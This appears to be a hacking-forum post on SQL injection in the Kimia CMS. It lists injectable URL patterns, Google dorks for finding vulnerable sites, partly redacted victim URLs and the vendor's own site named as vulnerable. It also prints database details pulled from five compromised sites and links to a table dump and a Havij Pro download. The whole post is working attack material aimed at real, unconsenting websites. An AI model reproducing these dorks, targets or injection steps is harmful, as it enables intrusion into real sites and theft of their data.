An old one, but still works fine!

http://packetstormsecurity.org/files/view/101202/kimia-sql.txt
http://www.securityhome.eu/exploits/exploit_pdf.php?eid=11754170304e409574e5f234.09320930

http://www.victim.com/image-details.php?id=[SQL]

http://www.victim.com/alert_article.php?id=[SQL]

http://www.victim.com/news-article.php?id=[SQL]

http://www.victim.com/gallery-list.php?id=[SQL]

http://www.victim.com/newsitem.php?id=[SQL]

first some googling..

google dorks:
inurl:”image-details.php?id=”
inurl:”alert_article.php?id=”
inurl:”news-article.php?id=”
inurl:”gallery-list.php?id=”
inurl:”newsitem.php?id=”

http://<removed for privacy>/gallery-list.php?id=18
http://<removed for privacy>/producer/newsitem.php?id=6
http://<removed for privacy>/article.php?id=159
http://<removed for privacy>/products.php?id=41

ofcourse the makers

http://www.kimia.co.za/newslist.php?interval=10&min=30&newsID=72

This I won’t remove they are vulnerable themselfs

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.2.6-1+lenny13
DB Server: MySQL >=5
Resp. Time(avg): 1678 ms
Current User: propeo_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: propeo_db1
System User: propeo_1@<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: ‘propeo_1′@’%’
Data Bases: information_schema
propeo_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL error based
Resp. Time(avg): 542 ms
Current User: foxanr_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: foxanr_db1
System User: foxanr_1@<removed for privacy>
Host Name: d<removed for privacy>
Installation dir: /usr/
DB User: ‘foxanr_1′@’%’
Data Bases: information_schema
foxanr_db1

 

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 1439 ms
Current User: joymag_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: joymag_db1
System User: joymag_1@<removed for privacy>
Host Name: <removed for privacy>
Installation dir: /usr/
DB User: ‘joymag_1′@’%’
Data Bases: information_schema
joymag_db1

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 3148 ms
Current User: kimiaa_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: kimiaa_db1
System User: kimiaa_1?dedi110

 

Target: http://<removed for privacy>
Host IP: <removed for privacy>
Web Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g mod_perl/2.0.4 Perl/v5.10.0
Powered-by: PHP/5.3.3-7+squeeze3+hetz2
DB Server: MySQL unknown ver
Resp. Time(avg): 2508 ms
Current User: robassu_1@<removed for privacy>
Sql Version: 5.1.49-3~bpo50+1
Current DB: robassu_db1
System User: robassu_1@<removed for privacy>
Host Name: dedi110.jn

table structure:  http://dl.dropbox.com/u/4378489/Forums/evilzone/Kimia_tables.html

Use with Havij Pro 1.15
http://www.ziddu.com/download/17108226/Havij_1.15_Pro.rar.html